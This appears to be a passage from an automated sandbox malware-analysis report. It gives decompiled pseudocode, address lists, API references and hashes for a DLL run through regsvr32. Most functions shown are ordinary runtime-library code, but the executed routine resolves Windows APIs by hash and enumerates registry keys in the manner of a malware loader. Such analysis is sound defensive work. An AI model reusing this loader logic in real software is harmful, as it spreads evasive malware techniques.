				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;
				signed int _t41;
				signed char _t42;
				void* _t46;
				signed char _t47;
				void* _t49;
				void* _t52;
				void* _t59;
				signed int _t66;
				signed long long _t78;
				signed long long _t89;
				signed long long _t92;
				signed long long _t93;

				_t49 = __edx;
				_a8 = __rbx;
				_a24 = __rbp;
				 *__rcx = 0;
				_t89 = _t92;
				r14d = r9d;
				_t93 = _t92;
				_t47 = _t46 - 1;
				if (__eflags == 0) goto 0x130f20f9;
				_t52 = _t89 - 1;
				if (_t52 == 0) goto 0x130f20f2;
				_t35 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				_t36 = E00007FFC7FFC130EE580(_t35);
				goto 0x130f211f;
				 *0xc0000000 =  *0xc0000000 + _t36;
				asm("pop es");
				 *_t93 =  *_t93 + _t47;
				 *_t93 =  *_t93 | _t47;
				 *_t92 =  *_t92 << 0xc8;
				asm("sbb eax, eax");
				goto 0x130f211f;
				 *_t93 =  *_t93 + _t36;
				 *0x80000000 =  *0x80000000 + _t36;
				_t78 = _t93 & _t89;
				if (_t52 == 0) goto 0x130f218b;
				if (_t78 == 0x100) goto 0x130f2184;
				if (_t78 == 0x200) goto 0x130f217d;
				if (_t78 == 0x300) goto 0x130f2176;
				if (_t78 == 0x400) goto 0x130f218b;
				if (_t78 == 0x500) goto 0x130f216f;
				if (_t78 == 0x600) goto 0x130f217d;
				_t59 = _t78 - _t89;
				if (_t59 == 0) goto 0x130f216f;
				_t37 = E00007FFC7FFC130EE6A0(_t78);
				 *_t78 = 0x16;
				_t38 = E00007FFC7FFC130EE580(_t37);
				goto 0x130f2190;
				 *0x1 =  *0x1 + _t38;
				asm("adc edi, [eax+0x5]");
				goto 0x130f2190;
				 *0x4 =  *0x4 + _t38;
				 *((intOrPtr*)(_t89 - 0x127cf7bd)) =  *((intOrPtr*)(_t89 - 0x127cf7bd)) +  ~_t47;
				asm("adc [edx+ecx*2-0x7d], dh");
				asm("in eax, dx");
				asm("adc [esi+edi-0x7d], dh");
				asm("in eax, dx");
				asm("adc [edx+esi-0x7d], dh");
				asm("in eax, dx");
				asm("adc [esi-0x7d], dh");
				asm("in eax, dx");
				if (_t59 == 0) goto 0x130f21be;
				_t39 = E00007FFC7FFC130EE6A0(0x4);
				 *0x4 = 0x16;
				_t40 = E00007FFC7FFC130EE580(_t39);
				goto 0x130f21e4;
				sil = __rcx[1] == 0x80000000;
				goto 0x130f21e4;
				 *0x4 =  *0x4 + _t40;
				 *0x2BE10EB00000004 =  *0x2BE10EB00000004 | _t93;
				goto 0x130f21e4;
				__rcx[5] = __rcx[5] & 0x00000000;
				bpl = 0x80;
				__rcx[3] = 0;
				__rcx[4] = 0x80;
				if ((bpl & dil) == 0) goto 0x130f21fd;
				 *__rcx =  *__rcx | 0x00000010;
				if ((_t93 & 0x00074000) != 0) goto 0x130f2222;
				_t41 = E00007FFC7FFC130F4DDC(_t49, 0x4,  &_a16);
				if (0x4 != 0) goto 0x130f229b;
				if (_a16 == 0x8000) goto 0x130f2225;
				 *__rcx =  *__rcx | bpl;
				_t42 = _t41 & r14d;
				if ((bpl & _t42) != 0) goto 0x130f2245;
				__rcx[4] = 1;
				_t66 = dil & 0x00000040;
				if (_t66 == 0) goto 0x130f2259;
				asm("bts dword [ebx+0x14], 0x1a");
				asm("bts dword [ebx+0x4], 0x10");
				__rcx[3] = __rcx[3] | 0x00000004;
				asm("bt edi, 0xc");
				if (_t66 >= 0) goto 0x130f2262;
				__rcx[4] = __rcx[4] | 0x00000100;
				asm("bt edi, 0xd");
				if (_t66 >= 0) goto 0x130f226d;
				asm("bts dword [ebx+0x14], 0x19");
				if ((dil & 0x00000020) == 0) goto 0x130f227a;
				asm("bts dword [ebx+0x14], 0x1b");
				goto 0x130f2285;
				if ((dil & 0x00000010) == 0) goto 0x130f2285;
				asm("bts dword [ebx+0x14], 0x1c");
				return _t42;
			}





















                                0x7ffc130f20a8
                                0x7ffc130f20a8
                                0x7ffc130f20ad
                                0x7ffc130f20bd
                                0x7ffc130f20c0
                                0x7ffc130f20c2
                                0x7ffc130f20c8
                                0x7ffc130f20d3
                                0x7ffc130f20d7
                                0x7ffc130f20d9
                                0x7ffc130f20dc
                                0x7ffc130f20de
                                0x7ffc130f20e3
                                0x7ffc130f20e9
                                0x7ffc130f20f0
                                0x7ffc130f20fb
                                0x7ffc130f20fd
                                0x7ffc130f20fe
                                0x7ffc130f2104
                                0x7ffc130f2107
                                0x7ffc130f210c
                                0x7ffc130f2118
                                0x7ffc130f2123
                                0x7ffc130f2125
                                0x7ffc130f2129
                                0x7ffc130f212b
                                0x7ffc130f2132
                                0x7ffc130f2139
                                0x7ffc130f2140
                                0x7ffc130f2147
                                0x7ffc130f214e
                                0x7ffc130f2155
                                0x7ffc130f2157
                                0x7ffc130f2159
                                0x7ffc130f215b
                                0x7ffc130f2160
                                0x7ffc130f2166
                                0x7ffc130f216d
                                0x7ffc130f2178
                                0x7ffc130f217c
                                0x7ffc130f2182
                                0x7ffc130f218d
                                0x7ffc130f218f
                                0x7ffc130f2195
                                0x7ffc130f2199
                                0x7ffc130f219a
                                0x7ffc130f219e
                                0x7ffc130f219f
                                0x7ffc130f21a3
                                0x7ffc130f21a4
                                0x7ffc130f21a8
                                0x7ffc130f21a9
                                0x7ffc130f21ac
                                0x7ffc130f21b1
                                0x7ffc130f21b7
                                0x7ffc130f21bc
                                0x7ffc130f21c7
                                0x7ffc130f21cb
                                0x7ffc130f21d6
                                0x7ffc130f21da
                                0x7ffc130f21e0
                                0x7ffc130f21e4
                                0x7ffc130f21e8
                                0x7ffc130f21eb
                                0x7ffc130f21ee
                                0x7ffc130f21f8
                                0x7ffc130f21fa
                                0x7ffc130f220c
                                0x7ffc130f2213
                                0x7ffc130f221a
                                0x7ffc130f2220
                                0x7ffc130f2222
                                0x7ffc130f2236
                                0x7ffc130f223c
                                0x7ffc130f223e
                                0x7ffc130f2245
                                0x7ffc130f2249
                                0x7ffc130f224b
                                0x7ffc130f2250
                                0x7ffc130f2255
                                0x7ffc130f2259
                                0x7ffc130f225d
                                0x7ffc130f225f
                                0x7ffc130f2262
                                0x7ffc130f2266
                                0x7ffc130f2268
                                0x7ffc130f2271
                                0x7ffc130f2273
                                0x7ffc130f2278
                                0x7ffc130f227e
                                0x7ffc130f2280
                                0x7ffc130f229a

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                • String ID:
                                • API String ID: 72036449-0
                                • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction ID: a29df5b4091cd437e0b99f029867bc5ddfa8e1a5fa130d5ab96c2e0768c50546
                                • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction Fuzzy Hash: 6551A12AE0CE2F43F7A9692C8E0137A66DCBB50738F194475DB0D661D6CA2CE860C665
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF0D4 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E00007FFC7FFC130EF0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
				void* _t9;
				void* _t10;
				intOrPtr _t22;
				intOrPtr _t24;
				void* _t33;
				void* _t34;

				_t16 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t22 =  *0x13123888; // 0x7
				if (_t22 == 0xffffffff) goto 0x130ef0fe;
				E00007FFC7FFC130EF5BC(_t10, _t22 - 0xffffffff, __rax, __rax, _t22);
				if (__rax != 0) goto 0x130ef13f;
				asm("int1");
				asm("invalid");
				_t33 = __rax;
				if (__rax != 0) goto 0x130ef11e;
				E00007FFC7FFC130EE114(__rax, 0);
				goto 0x130ef15a;
				_t24 =  *0x13123888; // 0x7
				E00007FFC7FFC130EF614(_t10, __rax, __rax, __rax, _t24, __rax, _t34);
				if (__rax == 0) goto 0x130ef117;
				E00007FFC7FFC130EEE40(__rax, __rax);
				_t9 = E00007FFC7FFC130EE114(_t16, 0);
				if (_t33 == 0) goto 0x130ef15a;
				SetLastError(??);
				return _t9;
			}









                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0de
                                0x7ffc130ef0e4
                                0x7ffc130ef0ef
                                0x7ffc130ef0f1
                                0x7ffc130ef0fc
                                0x7ffc130ef10a
                                0x7ffc130ef10b
                                0x7ffc130ef10d
                                0x7ffc130ef113
                                0x7ffc130ef117
                                0x7ffc130ef11c
                                0x7ffc130ef11e
                                0x7ffc130ef127
                                0x7ffc130ef131
                                0x7ffc130ef133
                                0x7ffc130ef13a
                                0x7ffc130ef142
                                0x7ffc130ef146
                                0x7ffc130ef159

                                APIs
                                • GetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF0DE
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF146
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF15C
                                • abort.LIBCMT ref: 00007FFC130EF162
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: ErrorLast$abort
                                • String ID:
                                • API String ID: 1447195878-0
                                • Opcode ID: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                                • Instruction ID: ce5543993cea57cd4835e1aa8729aae120ec9e7bb04bd31614269084bfa2f0fb
                                • Opcode Fuzzy Hash: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                                • Instruction Fuzzy Hash: 99019224B0AF6E42FA586774A55613821D18F487B8F25093CD91E267C2ED2CF869C230
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130ED734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                Download Yara Rule
                                C-Code - Quality: 48%
                                			E00007FFC7FFC130ED734(void* __ecx, void* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, long long _a16, signed int _a24, char _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t26;
				intOrPtr* _t48;
				long long* _t49;
				long long _t52;
				long long _t58;
				void* _t60;
				long long _t78;
				long long _t81;
				long long _t82;
				intOrPtr* _t83;
				void* _t87;

				_t60 = __rcx;
				_a8 = __rbx;
				_t2 = _t60 - 1; // -1
				_t48 = _t2;
				r14d = __ecx;
				if (_t48 - 1 <= 0) goto 0x130ed768;
				_t26 = E00007FFC7FFC130EE6A0(_t48);
				asm("push cs");
				 *_t48 =  *_t48 + _t26;
				goto 0x130ed897;
				E00007FFC7FFC130F05F8();
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t83 =  *0x13124950; // 0x7632a0
				 *0x13124960 = 0x131243e0;
				if (_t83 == 0) goto 0x130ed79f;
				if ( *_t83 != dil) goto 0x130ed7a2;
				_t49 =  &_a32;
				_a24 = 0;
				_v56 = _t49;
				r8d = 0;
				_a32 = 0;
				E00007FFC7FFC130ED514(0x131243e0, 0x131243e0, 0, 0, 0x131243e0, _t87, __r8,  &_a24);
				r8d = 1;
				E00007FFC7FFC130ED6D0(_a24, _a32, __r8);
				_t58 = _t49;
				if (_t49 != 0) goto 0x130ed7f3;
				E00007FFC7FFC130EE6A0(_t49);
				_t10 = _t58 + 0xc; // 0xc
				_t81 = _t10;
				 *_t49 = _t81;
				goto 0x130ed892;
				_v56 =  &_a32;
				E00007FFC7FFC130ED514(_t58, 0x131243e0, _t58, _t81, 0x131243e0, _t87, _t49 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x130ed829;
				_t52 = _a24 - 1;
				 *0x13124940 = _t58;
				 *0x1312493c = _t52;
				goto 0x130ed7ec;
				_a16 = _t81;
				0x130efef4();
				if (_t52 == 0) goto 0x130ed858;
				E00007FFC7FFC130EE114(_t52, _a16);
				_a16 = _t81;
				E00007FFC7FFC130EE114(_t52, _t58);
				_t82 = _t52;
				goto 0x130ed897;
				_t78 = _a16;
				if ( *_t78 == _t82) goto 0x130ed873;
				if ( *((intOrPtr*)(_t78 + 8)) != _t82) goto 0x130ed867;
				 *0x1312493c = _t82 + 1;
				_a16 = _t82;
				 *0x13124940 = _t78;
				E00007FFC7FFC130EE114(_t78 + 8, 0);
				_a16 = _t82;
				return E00007FFC7FFC130EE114(_t78 + 8, _t58);
			}


















                                0x7ffc130ed734
                                0x7ffc130ed734
                                0x7ffc130ed747
                                0x7ffc130ed747
                                0x7ffc130ed74a
                                0x7ffc130ed750
                                0x7ffc130ed752
                                0x7ffc130ed760
                                0x7ffc130ed761
                                0x7ffc130ed763
                                0x7ffc130ed768
                                0x7ffc130ed774
                                0x7ffc130ed77f
                                0x7ffc130ed785
                                0x7ffc130ed78e
                                0x7ffc130ed798
                                0x7ffc130ed79d
                                0x7ffc130ed7a2
                                0x7ffc130ed7a6
                                0x7ffc130ed7ae
                                0x7ffc130ed7b3
                                0x7ffc130ed7b6
                                0x7ffc130ed7bf
                                0x7ffc130ed7c8
                                0x7ffc130ed7d5
                                0x7ffc130ed7da
                                0x7ffc130ed7e0
                                0x7ffc130ed7e2
                                0x7ffc130ed7e7
                                0x7ffc130ed7e7
                                0x7ffc130ed7ea
                                0x7ffc130ed7ee
                                0x7ffc130ed805
                                0x7ffc130ed80a
                                0x7ffc130ed813
                                0x7ffc130ed818
                                0x7ffc130ed81a
                                0x7ffc130ed821
                                0x7ffc130ed827
                                0x7ffc130ed82d
                                0x7ffc130ed834
                                0x7ffc130ed83d
                                0x7ffc130ed843
                                0x7ffc130ed84b
                                0x7ffc130ed84f
                                0x7ffc130ed854
                                0x7ffc130ed856
                                0x7ffc130ed858
                                0x7ffc130ed865
                                0x7ffc130ed871
                                0x7ffc130ed873
                                0x7ffc130ed87b
                                0x7ffc130ed87f
                                0x7ffc130ed886
                                0x7ffc130ed88e
                                0x7ffc130ed8a9

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: FileModuleName_invalid_parameter_noinfo
                                • String ID: C:\Windows\system32\regsvr32.exe
                                • API String ID: 3307058713-464481000
                                • Opcode ID: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction ID: 7084bbd1c2dbe938e4b6161fd7881040c3d3f0c8cf2092391de03705d42cb1b7
                                • Opcode Fuzzy Hash: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction Fuzzy Hash: 8741C532B08E6A8AFB14DF2AE9400BD67E4EF44BA8B544035E94D27795DE3CE461C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F0CF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: FileHandleType
                                • String ID: @
                                • API String ID: 3000768030-2766056989
                                • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction ID: 6415c3513bfa0acc29d9b14b9bef021f32f128830bf2c6f512498d681071529e
                                • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction Fuzzy Hash: B621F922A08F6A42FB64CB259D9013826D5EF45778F240375D6AE277D4CE3DE891D310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Function 0000017B359E37E0 Relevance: 10.8, APIs: 7, Instructions: 333memoryregistryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 17b359e37e0-17b359e3845 GetModuleHandleA call 17b359e40f8 3 17b359e3847-17b359e3858 call 17b359e908c 0->3 4 17b359e38bf-17b359e38c2 0->4 11 17b359e385a-17b359e3864 3->11 12 17b359e3866 3->12 6 17b359e38c8-17b359e38e1 HeapAlloc 4->6 7 17b359e3cc0-17b359e3cd5 4->7 9 17b359e38e7-17b359e3905 call 17b359e487a call 17b359e908c 6->9 10 17b359e3cbb 6->10 22 17b359e3907 9->22 23 17b359e390d-17b359e394c call 17b359e638c call 17b359e908c 9->23 10->7 14 17b359e3869-17b359e387a call 17b359e40f8 11->14 12->14 14->4 21 17b359e387c-17b359e3888 call 17b359e5fc8 14->21 26 17b359e388d-17b359e3892 21->26 22->23 32 17b359e395e 23->32 33 17b359e394e-17b359e395c 23->33 26->4 28 17b359e3894-17b359e38aa call 17b359e5fc8 26->28 28->4 36 17b359e38ac-17b359e38bd call 17b359e5fc8 28->36 35 17b359e3961-17b359e3968 32->35 33->35 39 17b359e396a-17b359e397b call 17b359e908c 35->39 40 17b359e398e-17b359e39b6 HeapAlloc 35->40 36->4 50 17b359e3984-17b359e3989 39->50 51 17b359e397d-17b359e397f 39->51 43 17b359e3a8e 40->43 44 17b359e39bc-17b359e39d0 call 17b359e908c 40->44 45 17b359e3a93-17b359e3a99 43->45 53 17b359e39d2-17b359e39f9 RegOpenKeyW 44->53 54 17b359e39fb 44->54 48 17b359e3cb1-17b359e3cb9 call 17b359e6ce4 45->48 49 17b359e3a9f-17b359e3ae9 call 17b359e47b0 call 17b359ea0ac 45->49 48->7 69 17b359e3b05-17b359e3b08 49->69 70 17b359e3aeb-17b359e3b03 call 17b359ea0ac 49->70 57 17b359e3cac-17b359e3caf 50->57 65 17b359e3caa 51->65 58 17b359e39fe-17b359e3a00 53->58 54->58 57->7 57->48 62 17b359e3a02-17b359e3a13 call 17b359e908c 58->62 63 17b359e3a7e-17b359e3a8c HeapFree 58->63 71 17b359e3a15-17b359e3a2e RegEnumKeyW 62->71 72 17b359e3a30 62->72 63->45 65->57 69->48 74 17b359e3b0e-17b359e3b1f call 17b359e5058 69->74 70->69 76 17b359e3a33-17b359e3a35 71->76 72->76 81 17b359e3b21-17b359e3b35 call 17b359e405c 74->81 82 17b359e3b4b-17b359e3b4e 74->82 79 17b359e3a37-17b359e3a4a call 17b359e6644 76->79 80 17b359e3a4c-17b359e3a52 76->80 79->62 79->80 84 17b359e3a54-17b359e3a5b 80->84 85 17b359e3a5d-17b359e3a6e call 17b359e908c 80->85 81->82 95 17b359e3b37-17b359e3b47 call 17b359e405c 81->95 82->48 87 17b359e3b54-17b359e3b57 call 17b359ea7a0 82->87 84->85 93 17b359e3a7a-17b359e3a7c 85->93 94 17b359e3a70-17b359e3a78 RegCloseKey 85->94 96 17b359e3b5c-17b359e3b5f 87->96 93->45 93->63 94->93 95->82 98 17b359e3b61-17b359e3b66 96->98 99 17b359e3b6b-17b359e3b99 96->99 98->48 101 17b359e3baf 99->101 102 17b359e3b9b-17b359e3ba3 99->102 103 17b359e3bb2-17b359e3bb5 101->103 102->103 104 17b359e3ba5-17b359e3bad call 17b359e4d70 102->104 106 17b359e3bb7-17b359e3bbc 103->106 107 17b359e3bc1-17b359e3bd6 call 17b359ea8e8 103->107 104->103 106->48 107->106 111 17b359e3bd8-17b359e3bf4 call 17b359e908c 107->111 114 17b359e3bf6-17b359e3bfa 111->114 115 17b359e3bfc 111->115 116 17b359e3bff-17b359e3c07 114->116 115->116 117 17b359e3c9d-17b359e3ca5 call 17b359e9d6c 116->117 118 17b359e3c0d-17b359e3c1e call 17b359e908c 116->118 117->65 123 17b359e3c26 118->123 124 17b359e3c20-17b359e3c24 118->124 125 17b359e3c29-17b359e3c3a call 17b359e908c 123->125 124->125 129 17b359e3c4b 125->129 130 17b359e3c3c-17b359e3c49 125->130 131 17b359e3c4e-17b359e3c55 129->131 130->131 133 17b359e3c57-17b359e3c64 call 17b359e908c 131->133 134 17b359e3c6f-17b359e3c7c call 17b359e908c 131->134 133->51 139 17b359e3c6a-17b359e3c6d 133->139 140 17b359e3c8f 134->140 141 17b359e3c7e-17b359e3c8d 134->141 139->57 142 17b359e3c92-17b359e3c95 140->142 141->142 142->7 144 17b359e3c97-17b359e3c9b 142->144 144->133
                                C-Code - Quality: 41%
                                			E0000017B17B359E37E0(long long* __rax, long long __rcx, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t80;
				void* _t83;
				void* _t84;
				void* _t100;
				void* _t176;
				long long* _t222;
				long long* _t223;
				long long* _t224;
				long long _t225;
				intOrPtr _t226;
				long long* _t228;
				long long* _t229;
				void* _t230;
				void* _t288;
				long long _t289;
				void* _t291;
				void* _t294;
				intOrPtr _t295;
				intOrPtr _t296;
				void* _t300;
				void* _t301;
				void* _t303;
				void* _t310;
				void* _t313;
				long long _t314;
				void* _t315;
				void* _t316;
				long long _t319;
				long long* _t320;
				void* _t322;
				CHAR* _t327;

				_t222 = __rax;
				 *((long long*)(_t300 + 8)) = __rcx;
				_t301 = _t300 - 0x248;
				_t292 =  *0x359ed458;
				_t295 =  *((intOrPtr*)( *0x359ed458 + 8));
				 *((long long*)(_t301 + 0x20)) =  *0x359ed448;
				 *(_t301 + 0x298) =  *0x359ed450;
				GetModuleHandleA(_t327);
				_t80 = E0000017B17B359E40F8(__rax,  *0x359ed458 + 0x18, _t303, _t313, _t322, _t319);
				r13d = 0;
				if (_t80 != r13d) goto 0x359e38bf;
				E0000017B17B359E908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t222 == _t319) goto 0x359e3866;
				 *_t222();
				goto 0x359e3869;
				_t223 = _t319;
				_t83 = E0000017B17B359E40F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288); // executed
				if (_t83 != r13d) goto 0x359e38bf;
				_t84 = E0000017B17B359E5FC8(_t223, _t230,  *0x359ed448 + 0x17b359f1082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
				if (_t84 != r13d) goto 0x359e38bf;
				if (E0000017B17B359E5FC8(_t223, _t230,  *0x359ed448 + 0x17b359f1079, _t292 + 0x20, _t292, _t295) != r13d) goto 0x359e38bf;
				if (E0000017B17B359E5FC8(_t223, _t230,  *0x359ed448 + 0x17b359f1092, _t292 + 0x30, _t292, _t295) != r13d) goto 0x359e3cc0;
				HeapAlloc(??, ??, ??);
				_t289 = _t223;
				if (_t223 == _t319) goto 0x359e3cbb;
				E0000017B17B359E487A();
				E0000017B17B359E908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
				if (_t223 == _t319) goto 0x359e390d;
				 *_t223();
				_t24 = _t289 + 0xa8; // 0xa8
				_t224 = _t24;
				 *_t224 = _t224;
				 *((long long*)(_t289 + 0xb0)) = _t224;
				 *(_t289 + 0x9c) = r13d;
				 *(_t289 + 0xa0) = r13d;
				 *(_t289 + 0x98) = r13d;
				E0000017B17B359E638C(_t224, _t230, _t292, _t230);
				E0000017B17B359E908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t224 == _t319) goto 0x359e395e;
				r9d = 0;
				r8d = 0;
				 *_t224();
				goto 0x359e3961;
				_t225 = _t319;
				 *((long long*)(_t289 + 0x28)) = _t225;
				if (_t225 != _t319) goto 0x359e398e;
				E0000017B17B359E908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t225 == _t319) goto 0x359e3984;
				 *_t225();
				goto 0x359e3caa;
				goto 0x359e3cac;
				r8d = 0x1102;
				HeapAlloc(??, ??, ??);
				_t320 = _t225;
				_t34 = _t295 + 0x7f; // 0x7f
				r12d = _t34;
				if (_t225 == _t295) goto 0x359e3a8e;
				 *_t225 = 0;
				E0000017B17B359E908C(0x3d06c463, _t225,  *((intOrPtr*)( *0x359ed458 + 0x20)));
				if (_t225 == _t295) goto 0x359e39fb;
				RegOpenKeyW(??, ??, ??); // executed
				goto 0x359e39fe;
				if (r12d != 0) goto 0x359e3a7e;
				E0000017B17B359E908C(0xdf514773, _t225,  *((intOrPtr*)( *0x359ed458 + 0x20)));
				if (_t225 == 0) goto 0x359e3a30;
				r9d = 0x104;
				RegEnumKeyW(??, ??, ??, ??); // executed
				goto 0x359e3a33;
				if (r12d != 0) goto 0x359e3a4c;
				_t100 = E0000017B17B359E6644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
				if (_t100 == 0) goto 0x359e3a02;
				if (_t100 != 0x103) goto 0x359e3a5d;
				 *0x359ed438 = _t320;
				E0000017B17B359E908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0x359ed458 + 0x20)));
				if (_t225 == 0) goto 0x359e3a7a;
				RegCloseKey(??); // executed
				if (0 == 0) goto 0x359e3a93;
				HeapFree(??, ??, ??);
				goto 0x359e3a93;
				r13d = 0;
				if (8 != r13d) goto 0x359e3cb1;
				_t296 =  *0x359ed448;
				_t47 = _t320 + 8; // 0x8
				r8d = _t47;
				0x359e47b0();
				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
				if (E0000017B17B359EA0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x17b359e0000 + _t296 + 0x11188) == r13d) goto 0x359e3b05;
				_t310 = 0x17b359e0000 + _t296 + 0x111e0;
				if (E0000017B17B359EA0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0x359e3cb1;
				_t57 = _t289 + 8; // 0x8
				_t286 = _t57;
				if (E0000017B17B359E5058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0x359e3b4b;
				E0000017B17B359E405C(_t230, _t289, _t57, _t289, _t292, _t296);
				 *((long long*)(_t289 + 0x30)) = _t225;
				if (_t225 == _t320) goto 0x359e3b4b;
				_t59 = _t289 + 8; // 0x8
				E0000017B17B359E405C(_t230, _t59, _t57, _t289, _t292, _t296);
				 *((long long*)(_t289 + 0x38)) = _t225;
				_t144 =  !=  ? r13d : 8;
				_t207 = ( !=  ? r13d : 8) - r13d;
				if (( !=  ? r13d : 8) != r13d) goto 0x359e3cb1;
